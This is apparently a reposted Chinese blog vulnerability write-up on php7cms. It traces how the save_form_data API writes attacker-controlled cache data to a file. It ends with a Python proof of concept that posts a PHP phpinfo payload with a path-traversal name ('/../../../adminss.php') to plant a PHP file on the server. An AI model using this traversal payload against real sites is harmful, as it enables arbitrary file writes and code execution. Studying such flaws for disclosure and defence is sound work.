标签:条件 需要 substr control word str space protect fwrite
|
01
02
03
04
05
06
07
08
09
10
11
12
|
// php7cms/Core/Controllers/Api/Api.php// 52~61 linepublic function save_form_data() { $rt = \Phpcmf\Service::L(‘cache‘)->init(‘file‘)->save( \Phpcmf\Service::L(‘Input‘)->get(‘name‘), \Phpcmf\Service::L(‘Input‘)->post(‘data‘), 7200 ); var_dump($rt); exit;} |
|
01
02
03
04
05
06
07
08
09
10
11
12
|
// php7cms/Fcms/Library/Cache.php // 112~121 line public function init($handler = ‘‘, $prefix = ‘site-‘.SITE_ID.‘-‘) { $config = new \Config\Cache(); $config->handler = ‘file‘; $config->prefix = $prefix; !$config->prefix && $config->prefix = ‘site-‘.SITE_ID.‘-‘; $config->path = WRITEPATH.‘caching/‘; $cache = \Config\Services::cache($config, 0); return $cache; } |
|
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
|
// php7cms/System/Cache/Handlers// 107~125 linepublic function save(string $key, $value, int $ttl = 60){ $key = $this->prefix . $key; $contents = [ ‘time‘ => time(), ‘ttl‘ => $ttl, ‘data‘ => $value, ]; if ($this->writeFile($this->path . $key, serialize($contents))) { chmod($this->path . $key, 0640); return true; } return false;} |
|
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
|
//324~345 line protected function writeFile($path, $data, $mode = ‘wb‘) { if (($fp = @fopen($path, $mode)) === false) { return false; } flock($fp, LOCK_EX); for ($result = $written = 0, $length = strlen($data); $written < $length; $written += $result) { if (($result = fwrite($fp, substr($data, $written))) === false) { break; } } flock($fp, LOCK_UN); fclose($fp); return is_int($result); } |
|
1
2
3
4
5
|
from requests import postpostData = { ‘data‘:‘<?php phpinfo()?>‘}postTest = post("http://localhost//index.php?s=api&c=api&m=save_form_data&name=/../../../adminss.php",data=postData) |
标签:条件 需要 substr control word str space protect fwrite
原文地址:https://www.cnblogs.com/ichunqiu/p/10149482.html
